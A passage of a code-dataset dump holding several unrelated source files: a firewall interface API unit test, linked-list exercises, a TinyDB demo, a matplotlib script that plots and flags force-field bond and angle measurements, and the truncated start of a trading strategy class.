(the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unit_test_framework\n\nclass APIUnitTestInterface(unit_test_framework.APIUnitTest):\n url = \"/api/v1/interface\"\n get_payloads = [{}]\n post_payloads = [\n {\n \"if\": \"em2\",\n \"descr\": \"UNIT_TEST\",\n \"enable\": True,\n \"type\": \"staticv4\",\n \"type6\": \"staticv6\",\n \"ipaddr\": \"10.250.0.1\",\n \"ipaddrv6\": \"2001:0db8:85a3:0000:0000:8a2e:0370:7334\",\n \"subnet\": \"24\",\n \"subnetv6\": \"120\",\n \"blockbogons\": True\n }\n ]\n put_payloads = [\n {\n \"id\": \"em2\",\n \"descr\": \"UNIT_TEST_UPDATED\",\n \"enable\": False,\n \"type\": \"dhcp\",\n \"type6\": \"dhcp6\",\n \"blockbogons\": False,\n \"apply\": True\n }\n ]\n delete_payloads = [\n {\n \"if\": \"em2\"\n }\n ]\n\nAPIUnitTestInterface()","sub_path":"tests/test_api_v1_interface.py","file_name":"test_api_v1_interface.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267771125","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\n if k == 0 or head == None:\n return head\n headNode = ListNode(0)\n headNode.next = head\n num, p = 0, headNode.next\n while p:\n num += 1\n p = p.next\n k = k % num\n pre, p = head, head\n count = 0\n while p:\n if count > k:\n pre = pre.next\n count += 1\n p = p.next\n q = headNode\n while pre.next:\n tmp = pre.next\n pre.next = tmp.next\n tmp.next = q.next\n q.next = tmp\n q = q.next\n return headNode.next\n","sub_path":"61_rotateRight.py","file_name":"61_rotateRight.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620531036","text":"from ds.node import Node\n\n\ndef find_cycle(n: Node) -> Node:\n slow = n\n fast = n\n while fast is not None and fast.next is not None:\n slow = slow.next\n fast = fast.next.next\n if fast == slow:\n # A collision has occurred\n break\n\n # If there is no collision, there is no cycle\n if fast.next is None:\n return None\n\n # Send slow back to head\n slow = n\n while slow != fast:\n slow = slow.next\n fast = fast.next\n\n return slow\n","sub_path":"py-dna/exercises/linked_lists/two_6_iter.py","file_name":"two_6_iter.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266325095","text":"from tinydb import TinyDB, Query\r\ndb = TinyDB(\"db.json\")\r\n\r\ninsert_list = [{'patient_No':'03','row':0,'contents':'test sentence 0.','label':0},\r\n {'patient_No':'03','row':1,'contents':'test sentence 1.','label':1},\r\n {'patient_No':'05','row':0,'contents':'test sentence 2.','label':2}]\r\n\r\n#db.insert_multiple(insert_list)\r\n\r\nfor item in db:\r\n print(item)\r\n\r\nprint('label = 1')\r\nque = Query()\r\n\r\nfor item in db.search(que.label==1):\r\n print(item)\r\n\r\n#更新\r\ndb.update({'label':5}, que.patient_No == '03')\r\n\r\nprint('after update')\r\n\r\nfor item in db.search(que.label==1):\r\n print(item)\r\n\r\nprint(db.all())\r\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533217818","text":"\nimport matplotlib.pyplot as plt\n\ndef flag_measurements(fname='bonds_N-C_deg-2.npz', mindb=None, groups=None, minfname='bonds_N-C_deg-2.minimum.npz', params={\"Mol\": {}, \"Bonds\": ['b1'], \"Angles\": [], \"ImproperTorsions\": [], \"ProperTorsions\": [], 'Energy': {}} ):\n \"\"\"\n energy is a list of keys to search for energy, example: {'oFF'; 'vdW'}. Plotted energies are relative to the min value.\n \"\"\"\n d = None\n m = None\n rms_str=\"ffRMS(L)= {:9.4e} ffRMS(E)= {:9.4e} measL= {:9.4e} measRMS(L)= {:9.4e} measRMS(E)= {:9.4e} \"\n rms_str=\"{:9.4f} {:9.4f} {:9.4f} {:9.4f} {:9.4f} \"\n\n\n ene_str=\"{:s}: meanE= {:9.4f} RMS(E)= {:9.4f} maxAngEne= {:9.4f} {:9.4f}\"\n ene_maxdel_str=\"DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}\"\n ref_ene_key = 'qm'\n\n index = None\n if os.path.exists(\"index.txt\"):\n with open(\"index.txt\", 'r') as fid:\n index = dict([line.strip('\\n').split()[::-1] for line in fid.readlines()])\n elif os.path.exists(os.path.join(\"..\",\"index.txt\")):\n with open(os.path.join(\"..\",\"index.txt\"), 'r') as fid:\n index = dict([line.strip('\\n').split()[::-1] for line in fid.readlines()])\n if(os.path.exists(fname)):\n d = np.load(fname, allow_pickle=True)\n if(mindb is not None):\n m = mindb\n elif(os.path.exists(minfname)):\n if(minfname.split('.')[-1] == \"npz\"):\n m = np.load(minfname, allow_pickle=True)\n else:\n with open(minfname, \"rb\") as fid:\n m = dict(pickle.load(fid))\n if(m is None):\n return\n\n\n if(\"Mol\" not in params):\n params[\"Mol\"] = {}\n params_new = collections.defaultdict(list)\n params_new.update(params)\n params = params_new\n params_new = None\n measurements = [\"Bonds\", \"Angles\", \"ImproperTorsions\", \"ProperTorsions\", \"Energy\"]\n colors = ['red', 'blue', 'purple', 'green', 'orange', 'yellow']\n rows = 1\n hasbonds = int(len(params[\"Bonds\"]) > 0)\n hasangles = int(len(params[\"Angles\"]) + len(params[\"ImproperTorsions\"]) + len(params[\"ProperTorsions\"]) > 0)\n hasenergy = int(len(params[\"Energy\"]) > 0)\n rows = hasbonds + hasangles + hasenergy\n logger.debug(\"VAR: rows= \" + str(rows))\n\n mol_list = params['Mol']\n if(mol_list == {}):\n vals = list(m[\"mol_data\"].keys())\n mol_list = dict(zip(range(len(vals)), vals))\n\n param_list = [p for p_list in measurements for p in params[p_list]]\n ene_out_fname = (\"ene.\"+\"{:s}.\"*len(param_list)+\"txt\").format(*param_list)\n fid = open(ene_out_fname, 'w') ; fid.close()\n # this is looping through each molecule\n for jj, (name, smiles_list) in enumerate(mol_list.items()):\n print(\"{:4d} {:4d} {:64s}:\".format(jj,int(index[name]),name), end=\" \")\n hits=0\n\n fig = plt.figure(figsize=(8,4*rows),dpi=120)\n logger.debug(\"fig created id \" + str(id(fig)))\n ax_grid = [] #[[]]*rows\n for r in range(rows):\n logger.debug(\"Init row {} for axes\\n\".format(r))\n ax = [plt.subplot2grid((rows,3),(r,0), colspan=2, fig=fig)]\n ax.append(plt.subplot2grid((rows,3),(r,2), fig=fig, sharey=ax[0]))\n logger.debug(\"ax left {} ax right {}\\n\".format(id(ax[0]), id(ax[1])))\n ax_grid.append(ax)\n logger.debug(\"axes look like\\n{}\\n\".format(str(ax_grid)))\n checks = [[[\"Bonds\"], hasbonds], \\\n [[\"Angles\", \"ProperTorsions\", \"ImproperTorsions\"], hasangles],\\\n [[\"Energy\"], hasenergy]]\n present = 0\n plot_idx = {}\n for ncheck_i, check_i in enumerate(checks):\n if(check_i[1]):\n for param in check_i[0]:\n plot_idx[param] = present\n present += 1\n logger.debug(\"Will plot using {} axes\\n\".format(present))\n logger.debug(str(plot_idx))\n\n fig.subplots_adjust(wspace=.3, hspace=.2,right=.95)\n ddata = []\n mdata = {}\n mdatamean = {}\n lows = []\n\n #first is key\n #then is param vs data\n # then is 1xN for param data (choose 0)\n # then is param\n\n #oFF_labels = [c[0] for c in m.values()]\n used_labels = []\n c_idx = -1\n used_colors = {}\n bond_r0 = {}\n bond_k = {}\n bond_smirks = {}\n smiles_hits = []\n smiles_idx = []\n bond_dict = {}\n\n nonempty_ene = False\n # this is looping through each conformation of the molecule\n for ii,smiles in enumerate(smiles_list):\n all_params = []\n skip=False\n if(len(params[\"Energy\"].keys()) > 0):\n for ene_group in params[\"Energy\"]:\n if(\"energy\" not in m[\"mol_data\"][smiles]):\n logger.debug(\"SKIP 1\")\n skip=True\n break\n if(ene_group == 'qm'):\n if('qm' not in m[\"mol_data\"][smiles][\"energy\"]):\n logger.debug(\"SKIP 2\")\n skip=True\n break\n else:\n for ene_type in params[\"Energy\"][ene_group]:\n if(ene_type not in m[\"mol_data\"][smiles][\"energy\"][ene_group]):\n logger.debug(\"SKIP 3\")\n skip=True\n break\n if(skip): break\n if(skip): break\n if(skip): break\n for measure in measurements:\n if(measure == \"Energy\"):\n continue\n try:\n all_params += [p['oFF'] for p in m[\"mol_data\"][smiles][measure][\"indices\"].values()]\n except KeyError:\n print(\"Mol with smiles\", smiles, \"empty or corrupted (missing\", measure, \". Skipping\")\n skip=True\n break\n if(skip): break\n for param in params[measure]:\n if(not (param in all_params)):\n #print(smiles, \"Does not have\", param)\n skip=True\n break\n if(skip):\n continue\n #print(\"HIT!\")\n #try:\n #print(m[smiles].shape, end=\" \")\n #if(False and (not (d is None)) and smiles in d):\n if(0):\n for i,(j,jmin) in enumerate(zip(d[smiles][1].T[1:],m[smiles][1].T[1:])):\n label = m[smiles][0][0][i]['id']\n #print(ii, i, smiles, end=\" \")\n ax = subplot2grid((1,3),(0,0), colspan=2)\n ax.plot(d[smiles][1][:,0], j,'b.', ms=5)\n ax.plot(m[smiles][1][:,0], jmin, 'k.-', ms=7)\n ddata += list(j)\n mdata.setdefault(m[smiles][0][i], [])\n mdata[m[smiles][0][i]] += list(jmin)\n ax2.hist(j,bins=10, color='b', orientation='horizontal')\n ax2.hist(jmin,bins=10, color='k', orientation='horizontal')\n else:\n for measure_ii, measure in enumerate(measurements):\n logger.debug(\"VAR: measure= \" + str(measure))\n if(measure not in params):\n logger.debug(\"Not in params so skipping: \" + str(measure))\n continue\n if(len(params[measure]) == 0):\n logger.debug(\"Nothing in params for: \" + str(measure) + \" so skipping\")\n continue\n if(measure != \"Energy\"):\n for i,(index_key,index_dat) in enumerate(m[\"mol_data\"][smiles][measure][\"indices\"].items()):\n label = index_dat['oFF']\n #print(ii, i, smiles, jmin.mean(), end=\" \")\n plot_label=None\n if(not (label in params[measure])):\n logger.debug(\"This param not wanted so skipping: \" + str(label))\n #print(\"param\", label, \" not wanted. skipping\")\n continue\n logger.debug(\"Continuing to plot for : \" + str(label))\n hits += 1\n #print(index_key)\n if(not (smiles in smiles_hits)):\n smiles_hits.append(smiles)\n smiles_idx.append(ii)\n if(not (label in used_labels)):\n plot_label=label\n used_labels.append(label)\n c_idx += 1\n used_colors[label] = colors[c_idx]\n if( not ( label in [\"a0\", \"b0\", \"t0\", \"i0\"] )):\n if(measure == \"Bonds\"):\n bond_r0[label] = m['oFF'][label]['length']\n elif(measure == \"Angles\"):\n bond_r0[label] = m['oFF'][label]['angle']\n bond_smirks[label] = m['oFF'][label]['smirks']\n bond_dict[label] = m['oFF'][label]\n if( not (label[0] in 'ti')):\n bond_k[label] = m['oFF'][label]['k']\n \n color = used_colors[label]\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n measure_data = m[\"mol_data\"][smiles][measure][\"values\"][:,index_dat[\"column_idx\"]]\n #if(measure == \"Angles\"):\n # pass\n #measure_data *= np.pi/180\n #print(plot_idx, \"plotting\", label, \"td_ang=\", td_ang)\n\n if(td_ang[0] is not None):\n logger.debug(\"***PLOTTING {:s} to ax {:s} id {}\\n\".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0])))\n ax_grid[plot_idx[measure]][0].plot(td_ang, measure_data, lw=.1, ls='-', marker='.' , color=color, label=plot_label, ms=2)\n ax_grid[plot_idx[measure]][0].legend(loc='upper right')\n if(label not in mdata):\n mdata[label] = []\n mdata[label] += list(measure_data)\n\n mdatamean.setdefault(smiles, {})\n mdatamean[smiles].setdefault(label, [])\n mdatamean[smiles][label].append(measure_data.mean())\n else:\n for ene_group in params['Energy']:\n logger.debug(\"VAR: ene_group=\" + str(ene_group))\n if(ene_group == 'qm'):\n c_idx += 1\n used_colors[ene_group] = colors[c_idx]\n label = ene_group\n color = used_colors[label]\n ene = np.array(m[\"mol_data\"][smiles]['energy'][ene_group]) * hartree2kcalmol\n ene -= ene.min()\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n if(td_ang[0] is not None):\n logger.debug(\"plotting to idx\" + str(plot_idx[measure]) + \" for measure \" + str(measure) )\n logger.debug(\"***PLOTTING {:s} to ax {:s} id {}\\n\".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0])))\n ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label)\n ax_grid[plot_idx[measure]][0].set_ylabel(\"Energy (kcal/mol)\")\n nonempty_ene = True\n\n if(label not in mdata):\n mdata[label] = []\n mdata[label] += list(ene)\n\n mdatamean.setdefault(smiles, {})\n mdatamean[smiles].setdefault(label, [])\n mdatamean[smiles][label].append(ene.mean())\n else:\n logger.debug(\"VAR: ene_types=\" + str(list(params[\"Energy\"].keys())))\n for ene_type in params[\"Energy\"][ene_group]:\n logger.debug(\"VAR: ene_type=\" + str(ene_type))\n ene = m[\"mol_data\"][smiles]['energy'][ene_group][ene_type]\n if(len(ene) > 0 and isinstance(ene[0], simtk.unit.Quantity)):\n ene = np.array([x.value_in_unit(x.unit) for x in ene])\n ene -= ene.min()\n else:\n ene = np.array(ene)\n ene -= ene.min()\n label = \".\".join((ene_group, ene_type))\n c_idx += 1\n used_colors[label] = colors[c_idx % len(colors)]\n color = used_colors[label]\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n if(td_ang[0] is not None):\n logger.debug(\"plotting to idx \" + str(plot_idx[measure]) + \" for measure \" + str(measure) )\n ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label)\n ax_grid[plot_idx[measure]][0].set_ylabel(\"Energy (kcal/mol)\")\n nonempty_ene = True\n if(label not in mdata):\n mdata[label] = []\n mdata[label] += list(ene)\n\n mdatamean.setdefault(smiles, {})\n mdatamean[smiles].setdefault(label, [])\n mdatamean[smiles][label].append(ene.mean())\n if(nonempty_ene):\n ax_grid[plot_idx[measure]][0].legend(loc='upper left')\n #elif(jmin.mean() < 1.433):\n # print(\"Med:\", ii, k)\n #else:\n # print(\"High:\", ii, k)\n #print()\n\n #except TypeError:\n # print(\"TypeError\")\n #except IndexError:\n # print(\"IndexError\")\n title = str(dict([(k,v) for k,v in params.items() if (v != [] and k != \"Mol\")]))\n print(\"HITS= {:7.1f}\".format(hits/len(smiles_list)), end=\" \")\n for p in param_list:\n if( p in [\"a0\", \"b0\", \"i0\", \"t0\"] ):\n m['oFF'][p]['smirks'] = \"None\"\n logger.debug(\"hits or nonempty? \" + str(hits > 0 or nonempty_ene)) \n if(hits > 0 or nonempty_ene):\n smiles_idx_str = (\"{:s}.\"*len(smiles_idx)).format(*[str(x) for x in smiles_idx]) \n param_str = (\"{:s}.\"*len(param_list)).format(*[str(x) for x in param_list]) \n if(len(ddata) > 0):\n ax2.hist(ddata,bins=20, color='blue', orientation='horizontal')\n kT = (.001987*298.15)\n for ii,(label,dat) in enumerate(mdata.items()):\n #if(label[0] in \"ait\"):\n # #num *= np.pi/180\n # if(rows == 2):\n # plot_idx = 1\n # else:\n # plot_idx = 0\n plot_row = -1\n if(label[0] in \"ait\"):\n plot_row = plot_idx[\"Angles\"]\n elif(label[0] == \"b\"):\n plot_row = plot_idx[\"Bonds\"]\n else:\n plot_row = plot_idx[\"Energy\"]\n logger.debug(\"VAR: plot_row=\" + str(plot_row))\n color=used_colors[label]\n ax_grid[plot_row][1].hist(dat,bins=20, color=used_colors[label], histtype='step', orientation='horizontal')\n if( label in [\"a0\", \"b0\", \"t0\", \"i0\"] ):\n continue\n # TODO: calculate spread of torsions\n if(label[0] not in 'ab'):\n continue\n num = float(str(bond_r0[label]).split()[0])\n force_k = float(str(bond_k[label]).split()[0])\n delta = (2*(kT)/force_k)**.5\n if(label[0] in \"ait\"):\n delta *= 180/np.pi\n dat = np.array(dat)\n if((dat < (num - delta)).any() or (dat > (num + delta)).any()):\n print(label + \"= R\", end=\" \")\n elif(dat.max() < num or dat.min() > num):\n print(label + \"= Y\", end=\" \")\n else:\n print(label + \"= G\", end=\" \")\n ax_grid[plot_row][0].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color)\n ax_grid[plot_row][0].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n ax_grid[plot_row][0].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n ax_grid[plot_row][1].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color)\n ax_grid[plot_row][1].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n ax_grid[plot_row][1].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color)\n \n #ax[0].legend()\n #if(rows > 1):\n # ax[1].legend()\n print_header = True\n smiles_out_fname = (\"mol.\" + str(index[smiles]) + \".smiles_with.\"+\"{:s}.\"*len(param_list)+\"txt\").format(*param_list)\n #if(os.path.exists(smiles_out_fname)):\n # print_header = False\n with open(smiles_out_fname, 'w') as fid:\n for measure in measurements:\n mol_label_count = 0\n for label in params[measure]:\n if((label not in bond_r0) ):\n continue\n label_count = 0\n #r0 = float(str(bond_r0[label]).split()[0])\n r0 = bond_r0[label] / bond_r0[label].unit\n force_k = bond_k[label] / bond_k[label].unit\n delta = 2*kT/force_k**.5\n smirks = bond_dict[label]['smirks']\n #delta *= 180/np.pi\n #pass\n if(measure in [\"Angles\", \"ImproperTorsions\", \"ProperTorsions\"] ):\n delta = 2*kT/(force_k * (np.pi/180)**2 )**.5\n if(print_header):\n fid.write(\"# {:3s} {:24s} \\n\".format(label, smirks))\n fid.write(\"# r0 = {:6.2f}, k = {:6.2f} kT-> {:6.2f}\\n\".format(r0, force_k, delta))\n fid.write(\"#{:4s} {:5s} {:4s} {:60s} {:10s} {:10s} {:10s} {:10s} {:10s}\\n\".format(\"idx\", \"count\", \"flag\", \"category\", \"ffRMS(L)\", \"ffRMS(E)\", \"measL\", \"measRMS(L)\", \"measRMS(E)\"))\n\n if(measure in [\"Angles\", \"ImproperTorsions\", \"ProperTorsions\"] ):\n force_k = force_k * (np.pi/180)**2 # put into degrees\n\n #num *= np.pi/180\n #print([(smiles, mdatamean[smiles]) for smiles in smiles_hits])\n dat = []\n outstr = []\n per_term_flag = \"G\"\n flag = \"G\"\n bond_indices = []\n valence_term = {}\n for idx,smiles in zip(smiles_idx,smiles_hits):\n for index_key, index_dat in m[\"mol_data\"][smiles][measure][\"indices\"].items():\n if(index_dat['oFF'] == label):\n bond_indices.append(index_key)\n valence_term[index_key] = []\n for index_key in valence_term:\n single_terms = []\n index_count = 0\n for idx,smiles in zip(smiles_idx,smiles_hits):\n try:\n col_idx = m[\"mol_data\"][smiles][measure][\"indices\"][index_key][\"column_idx\"]\n except KeyError as e:\n logger.warning(\"\\n** Missing\" + str(e) + \": Probably different molecules with same smiles. Check the output! ** \")\n continue\n vals = np.atleast_1d(m[\"mol_data\"][smiles][measure][\"values\"][:,col_idx])\n valence_term[index_key] = np.append(valence_term[index_key], vals)\n flag = \"G\"\n if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()):\n flag = \"R\"\n elif(vals.max() < r0 or vals.min() > r0):\n flag = \"Y\"\n avglen = vals.mean()\n rmslen = rms(vals - r0)\n rmsene = rms(force_k/2 * (vals - r0)**2)\n mrmslen = rms(vals - avglen)\n mrmsene = rms(force_k/2 * (vals - avglen)**2)\n single_terms.append((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj,len(vals), flag,\"--->conformation \"+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene))\n if(vals.size > 1):\n for kk,val in enumerate(vals):\n flag = \"G\"\n if((val < (r0 - delta)) or (val > (r0 + delta))):\n flag = \"R\"\n elif(val < r0 or val > r0):\n flag = \"X\"\n avglen = val\n rmslen = rms(val - r0)\n rmsene = rms(force_k/2 * (val - r0)**2)\n mrmslen = rms(val - avglen)\n mrmsene = rms(force_k/2 * (val - avglen)**2)\n single_terms.append((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj,1, flag,\".....>intermediate \"+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene))\n index_count += len(vals)\n avglen = valence_term[index_key].mean()\n rmslen = rms(valence_term[index_key] - r0)\n rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2)\n mrmslen = rms(valence_term[index_key] - avglen)\n mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2)\n\n flag = \"G\"\n if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()):\n flag = \"R\"\n elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0):\n flag = \"Y\"\n outstr.append((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj, index_count, flag,\"==>atoms \" + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene))\n [outstr.append(term) for term in single_terms]\n dat = np.append(dat, valence_term[index_key])\n \n #if(measure == \"Angles\"):\n # pass\n #dat *= np.pi/180\n\n mol_label_count += len(dat)\n if(len(dat) > 0):\n flag = \"G\"\n if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()):\n flag = \"R\"\n elif(dat.max() < r0 or dat.min() > r0):\n flag = \"Y\"\n avglen = dat.mean()\n rmslen = rms(dat - r0)\n rmsene = rms(force_k/2 * (dat - r0)**2)\n mrmslen = rms(dat - avglen)\n mrmsene = rms(force_k/2 * (dat - avglen)**2)\n\n fid.write((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj,mol_label_count, flag,\"|>molecule \" + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) \n [fid.write(s) for s in outstr]\n print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=\" \")\n fragstr = \"all\"\n\n\n\n\n\n# ene_str=\"{:s}: meanE= {:9.4f} RMS(E)= {:9.4} maxAngEne= {:9.4f} {:9.4f}\"\n# ene_maxdel_str=\"DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}\"\n# ref_ene_key = 'qm'\n# \n if len(params[\"Energy\"]) > 1:\n with open(ene_out_fname, 'a') as fid:\n measure = \"Energy\"\n mol_label_count = 0\n ref_ene = np.array(mdata[ref_ene_key])\n logger.debug(\"VAR: ref_ene= \" + str(ref_ene))\n ref_ene_max_idx = ref_ene.argmax()\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n if(td_ang[0] == None):\n continue\n fid.write((\" {:4d} {:5d} {:>4s} {:60s} \" + ene_str + \"\\n\").format(jj,len(ref_ene), \"REF\",\"|>molecule \" + strip_conformation_number(smiles),ref_ene_key, ref_ene.mean(), rms(ref_ene - ref_ene.mean()), td_ang[ref_ene_max_idx], ref_ene[ref_ene_max_idx])) \n ene_list = {x:y for x,y in params[\"Energy\"].items() if x != \"qm\"}\n for ene_group in ene_list:\n for ene_type in ene_list[ene_group]:\n label = \".\".join((ene_group, ene_type))\n ene = np.array(mdata[label])\n ene_max_idx = ene.argmax()\n delta = ene - ref_ene\n delta_max_idx = np.abs(delta).argmax()\n fid.write((\" {:4d} {:5d} {:>4s} {:60s} \" + ene_str + \" \" + ene_maxdel_str +\"\\n\").format(jj,len(ene), \"\",\"==> \" + label, \"\", ene.mean(), rms(ene - ene.mean()), td_ang[ene_max_idx], ene[ene_max_idx], ene.mean() - ref_ene.mean(), td_ang[ene_max_idx] - td_ang[ref_ene_max_idx], ene[ene_max_idx] - ref_ene[ref_ene_max_idx], td_ang[delta_max_idx], delta[delta_max_idx])) \n\n\n # need argmax of ref for angle and ene \n # need mean angle\n # for label in params[measure]:\n # if((\"qm\" not in label) or (\"oFF\" not in label)):\n # continue\n # label_count = 0\n # #r0 = float(str(bond_r0[label]).split()[0])\n # \n # #delta *= 180/np.pi\n # #pass\n # if(print_header):\n # fid.write(\"#{:4s} {:5s} {:4s} {:50s} {:10s} {:10s} {:10s} {:10s} {:10s}\\n\".format(\"idx\", \"count\", \"flag\", \"category\", \"ffRMS(L)\", \"ffRMS(E)\", \"measL\", \"measRMS(L)\", \"measRMS(E)\"))\n # \n # #need argmax of angle and ene\n # # need argmax of different between data and ref\n #\n # # have a reference ene (the qm)\n # dat = []\n # outstr = []\n # per_term_flag = \"X\"\n # flag = \"X\"\n # bond_indices = []\n # valence_term = {}\n #\n #\n # single_terms = []\n # index_count = 0\n # for idx,smiles in zip(smiles_idx,smiles_hits):\n # try:\n # col_idx = m[\"mol_data\"][smiles][measure][\"indices\"][index_key][\"column_idx\"]\n # except KeyError as e:\n # logger.warning(\"\\n** Missing\" + str(e) + \": Probably different molecules with same smiles. Check the output! ** \")\n # continue\n # vals = np.atleast_1d(m[\"mol_data\"][smiles][measure][\"values\"][:,col_idx])\n # valence_term[index_key] = np.append(valence_term[index_key], vals)\n # flag = \"G\"\n # if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()):\n # flag = \"R\"\n # elif(vals.max() < r0 or vals.min() > r0):\n # flag = \"Y\"\n # avglen = vals.mean()\n # rmslen = rms(vals - r0)\n # rmsene = rms(force_k/2 * (vals - r0)**2)\n # mrmslen = rms(vals - avglen)\n # mrmsene = rms(force_k/2 * (vals - avglen)**2)\n # single_terms.append((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj,len(vals), flag,\"--->conformation \"+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene))\n # if(vals.size > 1):\n # for kk,val in enumerate(vals):\n # flag = \"G\"\n # if((val < (r0 - delta)) or (val > (r0 + delta))):\n # flag = \"R\"\n # elif(val < r0 or val > r0):\n # flag = \"X\"\n # avglen = val\n # rmslen = rms(val - r0)\n # rmsene = rms(force_k/2 * (val - r0)**2)\n # mrmslen = rms(val - avglen)\n # mrmsene = rms(force_k/2 * (val - avglen)**2)\n # single_terms.append((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj,1, flag,\".....>intermediate \"+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene))\n # index_count += len(vals)\n # avglen = valence_term[index_key].mean()\n # rmslen = rms(valence_term[index_key] - r0)\n # rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2)\n # mrmslen = rms(valence_term[index_key] - avglen)\n # mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2)\n #\n # flag = \"G\"\n # if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()):\n # flag = \"R\"\n # elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0):\n # flag = \"Y\"\n # outstr.append((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj, index_count, flag,\"==>atoms \" + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene))\n # [outstr.append(term) for term in single_terms]\n # dat = np.append(dat, valence_term[index_key])\n # \n # #if(measure == \"Angles\"):\n # # pass\n # #dat *= np.pi/180\n #\n # mol_label_count += len(dat)\n # if(len(dat) > 0):\n # flag = \"G\"\n # if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()):\n # flag = \"R\"\n # elif(dat.max() < r0 or dat.min() > r0):\n # flag = \"Y\"\n # avglen = dat.mean()\n # rmslen = rms(dat - r0)\n # rmsene = rms(force_k/2 * (dat - r0)**2)\n # mrmslen = rms(dat - avglen)\n # mrmsene = rms(force_k/2 * (dat - avglen)**2)\n #\n # fid.write((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj,mol_label_count, flag,\"|>molecule \" + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) \n # [fid.write(s) for s in outstr]\n # print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=\" \")\n\n\n\n\n if(\"fragment\" in m):\n fragstr = m[\"fragment\"]\n fig.suptitle((\"frag={:s} \" + \"{:s}\").format(fragstr,smiles))\n\n fig.savefig(\"fig.mol_\" + str(index[smiles]) + \".\" + param_str +\"png\")\n plt.close(fig)\n print()\n","sub_path":"offsb/dev/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":34257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394511424","text":"from bot.Indicators import AddIndicator\n\nclass AlwaysBuyStrategy:\n\t\"\"\" Always Buy Strategy:\n\tBuys when low < close and sells when close > low\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\" \"\"\"\n\t\tself.minimum_period = 5\n\t\n\tdef setup(self, df):\n\t\tself.df = df\n\n\tdef getIndicators(self):\n\t\treturn []\n\n\tdef checkBuySignal(self, i):\n\t\tdf = self.df\n\t\tif df[\"low\"][i] < df[\"close\"][i]:\n\t\t\treturn True\n\t\n\t\treturn False\n\t\t\n\tdef checkSellSignal(self, i):\n\t\tdf = self.df\n\t\tif df[\"close\"][i] > 